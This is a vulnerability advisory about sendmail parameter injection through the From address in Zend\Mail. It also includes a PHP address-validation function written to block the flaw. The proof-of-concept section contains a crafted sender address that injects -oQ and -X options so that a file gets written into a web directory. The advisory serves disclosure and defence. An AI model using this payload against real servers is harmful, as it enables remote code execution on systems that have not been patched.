Vulnerability Summary
The following report describes a remote code execution vulnerability found in ZendMail. The vulnerability allows an attacker to inject additional parameters into the sendmail binary via the From address.
Credit
An independent security researcher, Dawid Golunski (https://legalhackers.com/), has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
Vulnerability Details
“Zend\Mail provides generalized functionality to compose and send both text and MIME-compliant multipart email messages. Mail can be sent with Zend\Mail via the Mail\Transport\Sendmail, Mail\Transport\Smtp or the Mail\Transport\File transport. Of course, you can also implement your own transport by implementing the Mail\Transport\TransportInterface.”
http://framework.zend.com/manual/current/en/modules/zend.mail.introduction.html
When using the Zend\Mail class from ZendMail/Zend Framework to send emails with the Mail\Transport\Sendmail transport, a malicious user might be able to inject arbitrary parameters into the sendmail program due to insufficient address sanitization. If an attacker can control email headers, he could bypass sanitization by adding additional quote characters within a malicious email address.
Proof of Concept
<?php
use Zend\Mail;

$mail = new Mail\Message();
$mail->setBody('This is the text of the email.');
$mail->setFrom('"AAA\" -oQ/tmp -X/var/www/exploited.php BBB"@domain', 'Sender\'s name');
$mail->addTo('hacker@localhost', 'Name of recipient');
$mail->setSubject('TestSubject');

$transport = new Mail\Transport\Sendmail();
echo "gonna send...";
$transport->send($mail);
?>
The code above will inject the -oQ and -X parameters into the sendmail command.
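A defensive check an application can run on any user-influenced sender address before passing it to setFrom(), added here as an illustration and not taken from Zend Framework or the advisory. The function name isSafeSenderAddress and the sample inputs are assumptions made for this example; the check deliberately refuses quoted local parts, which is stricter than the mail address grammar allows.

```php
<?php
declare(strict_types=1);

/**
 * Added example (not Zend code): strict allow-list check for an address that
 * may end up as the sender handed to the sendmail binary.
 * Quotes, whitespace and backslashes are refused outright (an assumption:
 * the application does not need quoted local parts).
 */
function isSafeSenderAddress(string $address): bool
{
    // Bound the length (254 is the practical maximum for an address).
    if ($address === '' || strlen($address) > 254) {
        return false;
    }
    // Exactly one "@" separating local part and domain.
    if (substr_count($address, '@') !== 1) {
        return false;
    }
    [$local, $domain] = explode('@', $address);

    // Local part: unquoted dot-atom only, and no leading "-" so it can
    // never be read as an option by the program that receives it.
    $localOk = preg_match('/\A[A-Za-z0-9_+][A-Za-z0-9._+\-]{0,63}\z/', $local) === 1
        && strpos($local, '..') === false
        && substr($local, -1) !== '.';

    // Domain: dot-separated letter/digit/hyphen labels ending in a TLD.
    $domainOk = preg_match(
        '/\A(?:[A-Za-z0-9](?:[A-Za-z0-9\-]{0,61}[A-Za-z0-9])?\.)+[A-Za-z]{2,63}\z/',
        $domain
    ) === 1;

    return $localOk && $domainOk;
}

// Constructed sample inputs; the second is the address from the proof of concept above.
$samples = [
    'alice@example.com',
    '"AAA\" -oQ/tmp -X/var/www/exploited.php BBB"@domain',
    '-oQ/tmp@example.com',
    "bob@example.com\r\nBcc: x@example.com",
];

foreach ($samples as $candidate) {
    // json_encode makes embedded quotes and control characters visible.
    printf("%-6s %s\n", isSafeSenderAddress($candidate) ? 'ACCEPT' : 'REJECT', json_encode($candidate));
}
```

Only the first sample is accepted; the other three are rejected before they can reach the mail transport.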
Vendor response
Release announcement can be found here: https://framework.zend.com/blog/2016-12-20-zf-2-4-11-released.html
Advisory can be found here: https://framework.zend.com/security/advisory/ZF2016-04